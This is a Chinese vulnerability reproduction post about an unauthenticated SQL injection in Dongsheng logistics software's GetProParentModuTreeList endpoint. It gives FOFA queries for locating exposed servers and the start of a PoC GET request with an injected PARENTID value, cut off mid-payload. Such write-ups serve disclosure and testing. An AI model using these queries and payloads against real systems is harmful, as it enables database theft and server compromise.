东胜物流软件 GetProParentModuTreeList SQL注入漏洞复现

0x01 产品简介

东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。该公司初创于2004年11月(前身为青岛景宏物流信息技术有限公司),专注于航运物流相关环节的产品和服务。东胜物流信息管理系统货代版采用MS-SQLserver大型数据库,结合B/S+C/S的程序架构,流程简捷、严密、灵活,功能强大。具有良好的口碑和广泛的覆盖率。

0x02 漏洞概述

东胜物流软件 GetProParentModuTreeList 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:

body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"

7c6184de3ffb43e79a72e8ef4e994881.png

0x04 漏洞复现

PoC

GET /MvcShipping/MsBaseInfo/GetProParentModuTreeList?PARENTID=%27+AND+4757+IN+%28SELECT+%28CH

相关推荐

  1. 漏洞】NotificationX SQL注入漏洞(CVE-2024-1698)

    2024-06-13 19:50:02       22 阅读
  2. 漏洞】SpringBlade dict-biz SQL注入漏洞

    2024-06-13 19:50:02       13 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-06-13 19:50:02       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-06-13 19:50:02       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-06-13 19:50:02       18 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-06-13 19:50:02       20 阅读

热门阅读

  1. MYSQL(事务)

    2024-06-13 19:50:02       6 阅读
  2. 国产数据库助力数字中国建设高质量发展

    2024-06-13 19:50:02       6 阅读
  3. 量产导入 | SCAN和ATPG

    2024-06-13 19:50:02       9 阅读
  4. 函数用于将字符串反转以及函数的作用

    2024-06-13 19:50:02       5 阅读
  5. Chrome DevTools开发者调试工具

    2024-06-13 19:50:02       8 阅读
  6. 从零制作一个ubuntu的docker镜像

    2024-06-13 19:50:02       8 阅读
  7. 在 Ubuntu 上取消登录密码和锁屏功能的简易指南

    2024-06-13 19:50:02       11 阅读
  8. MySQL(2)

    2024-06-13 19:50:02       7 阅读
  9. AForge.NET介绍

    2024-06-13 19:50:02       7 阅读
  10. tar cjf xx.tar.bz2 xx,命令参数的含义

    2024-06-13 19:50:02       7 阅读